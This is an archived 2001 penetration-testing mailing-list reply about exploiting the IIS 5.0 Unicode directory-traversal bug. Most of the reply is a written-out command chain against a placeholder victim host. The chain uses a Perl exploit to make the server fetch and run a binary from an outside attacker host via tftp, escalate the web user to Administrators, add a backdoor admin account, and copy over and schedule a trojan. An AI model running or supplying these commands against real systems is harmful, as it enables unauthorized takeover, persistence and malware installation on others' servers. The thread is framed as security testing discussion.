Penetration Testing mailing list archives
Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug?
From: Nelson Brito <nelson () SECUNET COM BR>
Date: Mon, 26 Mar 2001 13:39:22 -0300
Renato Ettisberger wrote:
Hi, I'm doing a pen test and I found a IIS 5.0 (Win2k) with the Unicode bug. As you know, there is a way to span a shell with admin rights on a IIS 4.0 with the Unicode bug.
What way? Did you use CmdAsp.ASP to do that? Is it possible?
I ask me, if there is a way to gain admin rights on an IIS 5.0, Win2k with the Unicode bug too?
Yes, you can elevate IUSR_MACHINE's privilege to Administrators/Domain Admins Group. As an example: C:\BIGHacker>unicodexecute2.pl www.victim.com:80 "C:\\WINNT\\system32\\tftp.exe -i bighacker.host.com GET netddemsg.exe" C:\BIGHacker>unicodexecute2.pl www.victim.com:80 "netddemsg.exe \"C:\\WINNT\\system32\\net.exe localgroup Administrators IUSR_MACHINE /add\"" Then you'll have IUSR_MACHINE with Admin's privileges. So you could use the CmdAsp.ASP. But, if you want a "lamer's technique" you could do this after the commands above: C:\BIGHacker>unicodexecute2.pl www.victim.com:80 "C:\\WINNT\\system32\\net.exe user bighacker bighacker /add" C:\BIGHacker>unicodexecute2.pl www.victim.com:80 "C:\\WINNT\\system32\\net.exe localgroup Administrators bighacker /add" C:\BIGHacker>net use H: \\www.victim.com\C$ bighacker /u:bighacker C:\BIGHacker>copy my_favorite_trojan.exe H:\Temp C:\BIGHacker>at \\www.victim.com\C$ 13:37A H:\Temp\my_favorite_trojan.exe If the Schedule Service is stopped you'll need use the NTRK's "SC.EXE" tool(sc.exe \\www.victim.com start schedule). PS: Of course this technique only works if the traffic to port 139 TCP is permitted.
If I'm able to dump the password hash in crude form, how can I crack the password?
Yes, you can. If you elevate IUSR_MACHINE's privileges you should do anything you want. PPS: Sorry my poor English. Sem mais, -- # Nelson Brito - IBQN / Security Networks AG - The trust Company! # "Windows NT can also be protected from nmap OS detection scans # thanks to *Nelson Brito* ..." # Passage from "Hack Proofing your Network", page 93 open(S,shift) || die "Use: $0 <file>\n"; foreach(<S>){ chop; split(//,$_); print reverse @_; print "\n"; } close(S);
Current thread:
- [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)
- <Possible follow-ups>
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Wertheimer, Ishai (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? H D Moore (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 27)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 27)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 28)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? robmann (Mar 28)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)